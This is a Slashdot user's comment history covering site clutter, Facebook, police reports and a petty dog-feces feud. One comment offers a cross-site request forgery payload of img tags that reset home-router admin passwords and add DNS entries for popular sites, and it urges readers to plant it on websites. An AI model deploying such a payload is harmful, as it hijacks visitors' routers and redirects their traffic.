Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Comment Re:I hate dogs (Score 1) 177

I worked Graveyard for a decade or so once, and a Neighbor moved in, with his Dog. Said Neighbor let his Dog loose during the day.


Bark, bark, bark, poop, poop, poop. The Dog, that is. Cats started to disappear. I finally got fed up; talking to the Neighbor was like talking to his dog. One late night, just before going to work, I used the Fireplace shovel to fling the latest deposit against his Garage Door. Note that I did not cross Property Boundaries; I'm pretty good at flinging Shit from the street. This went on for a week or so. The Door began to become encrusted. Neither the Dog nor Dog Owner gave a Shit. And then I called the Landlord, as Anonymous Coward: "You know that Rental that you have on Lake Street? Why is the Garage Door always covered with Dog Feces?" Dog and Dog Owner moved out. It turns out that Dog Shit is hell on paint; the Garage Door had to be re-painted.

I think that it was Farley Mowat that pointed out that Wild Dogs and Wolves bury their Scat, and the habit of pooping anywhere and everywhere was a habit picked up from their new Human Masters.

In days of old, when Knights were bold And Toilets weren't invented They laid their Load beside the road And walked away contented.

God, I had hoped for a much better story after reading the first sentence :-)

Comment Re:I know what you're talking about (Score 2) 301

But it's not just slashdot. ALL websites are bum rushing the add more crap idea.

Correct. But as a geek site, slashdot should know better and lead by example.

And yes, other companies do look towards (perceived) geek sites such as slashdot, gnu.org and redhat.com in order to justify their own inadequacies. A while back, our company was putting a new website online, which had huge horse blinkers. When I pointed this out to the webmasters, their response was yeah, but just look your geek friends at gnu.org (which indeed had small blinkers at the time) and redhat.com (which is just fugly).

The situation has become so bad that even the pirate party has sites where half the links won't work, where the only way to make a donation is Paypal (even though most potential donators are local, and could use an IBAN bank account number).

So, slashdot, digg, heise.de, freshmeat, gnu.org, redhat: cut down on the crap, it's not only your own sites that you are littering, but the internet as a whole! Or, if you're actually enjoying turning the Internet into a landfill, then please stop the hypocrisy of posting articles complaining about it.

Comment Re:The battle now begins. (Score 1) 407

And indeed:

  1. The threat must be of serious bodily harm or death
  2. The threatened harm must be greater than the harm caused by the crime
  3. The threat must be immediate and inescapable
  4. The defendant must have become involved in the situation through no fault of his or her own

Comment Re:The battle now begins. (Score 1) 407

If the school were to log in to the victim's Facebook account using a password that was extracted under duress, that should rise to any court's definition of "unauthorized access to a computer system," or whatever the relevant laws say. The user simply doesn't have the authority to grant "authorized access" -- only Facebook can do that.

Even if the user would have authority to grant access to third parties, trying to extract that access under duress would still be a crime. The real question is whether the threat of loss of employment counts as duress, or whether duress has to be a physical threat against life or health, such as a gun pointed to user's head.

Comment Re:The battle now begins. (Score 2) 407

they have no contract with the company, so they cannot forbid them to do so. But they can forbid their clients to give away login credentials.

But the company interferes with a contract that Facebook has with its end user. And tortuous interference is an actionable claim:

Tortious interference with contract rights can occur where the tortfeasor (employer) convinces a party (employee=facebook user) to breach the contract against the plaintiff (facebook)

Comment Re:Facebook vs. mobile (Score 1) 332

Some other young people I know think of Facebook as a photo-sharing site. It's easy to upload photos from your phone to Facebook, and Facebook has good tools for organizing pictures.

... until Facebook notices that you used a Linux app to upload your photos, bans the app, and yanks all your photos.
The mistake has been corrected since then, but it's still a chilling experience.

Comment Yeah, and now they even blame Mozilla's POSTDATA (Score 1) 332

Yeah, and now they even blame Mozilla's POSTDATA bug on it:
Facebook doesn't want you to use the back button
... whereas in the old days, it was banks who were the scapegoat for this obnoxious behavior:
Banks are holding up Mozilla to make it break the back button on SSL pages that are the result of a form submission

Comment Re:How do you get offenders to stop? (Score 1) 321

You instantly kill any reason for the redirect to be there (their counts will no longer be accurate).

Although URL shortening services are often abused to do invasive statistics, that's not the only reason why they exist...

You know, some people still use them to shorten URLs (like how else would you fit a long google maps URL into a short twitter message?)

Comment Re:how would you prove (Score 1) 250

I'm telling you that walking in any busy police department in any city bigger than 100,000 people and asking for signatures on paper so that you can force Amazon to do something is a fools errand.

Not true. My father successfully got a police report in Lisbon (564657 inhabitants) for a stolen wallet, which contained far less than $300. And there was a huge queue, so it's not as if the police were underworked either.

Comment Re:Street justice? (Score 1) 250

Third: At what price level is Police involvement warranted? Its not exactly Grand Theft Kindle you know. Cops have a few more important things to do.

But they should a least do a report, which you can then use for your travel insurance, or (in this case) for Amazon. And here in Europe, Police usually do take the time to do a report, even for trivial thefts or losses (even if no investigation follows... but in this case, all you need is the report number).

Fifth: Cellphone companies in Europe do put stolen phones on a list. They can't be activated.

Not true, at least not in Luxembourg. A friend of mine got his cellphone stolen, he reported it to the police, but they claimed that although technically possible to block and locate it (by its IMEI number), it was policy that this was not done for a mere theft... (you'd have to wonder in what circumstances they would actually use the feature).

Comment Re:Seems Sensible (Score 1) 250

You've apparently never tried to report a stolen wallet or backpack, or even modest laptop. You fill out forms, answer questions,a nd they do _nothing_. It's just not important enough.

But at least you get the report form, needed to claim damages from your insurance company.

And if the stolen item does happen to fall into their lap, you do get it back. Case in point: my father got his wallet stolen in Lissabon, reported it to the police, and a couple of months later, he got it back.

What happens usually with wallets is that the thieves are "only" interested in the cash, and throw away the wallet (along with papers "useless" to them) as soon as possible (because it's dangerous to them to have id papers on them, which are not theirs). Eventually, somebody finds the wallet (because the thiefs don't bother with properly putting it into the trash, but rather throw it into the nearest bush or whatever), and brings it to the police... which then can send it back to you, if they've got a report on file.

Comment If you have a website, paste the following code (Score 2, Interesting) 134

Thanks so much for that URL.

If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):

<img src=";PASSWORD=admin&amp;PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
<img src=";THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=google.com&amp;ADDR=" width="1" height="1" alt="haha"/>
<img src=";THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.google.com&amp;ADDR=" width="1" height="1" alt="haha"/>
<img src=";THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=cnn.com&amp;ADDR=" width="1" height="1" alt="haha"/>
<img src=";THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.cnn.com&amp;ADDR=" width="1" height="1" alt="haha"/>
<img src=";THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=slashdot.org&amp;ADDR=" width="1" height="1" alt="haha"/>
<img src=";THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.slashdot.org&amp;ADDR=" width="1" height="1" alt="haha"/>

Six Laptops That Don't Burn 140

digihome writes, "An exploding laptop can really ruin your weekend, so here's a review of six laptops that are unlikely to blow up." From the article: "We evaluated everything from battery and air vent temperatures, AC power draw and battery life to performance and price... What we found is that there's a real difference among those notebooks that know how to take the heat without sacrificing performance."

Neutrinos are into physicists.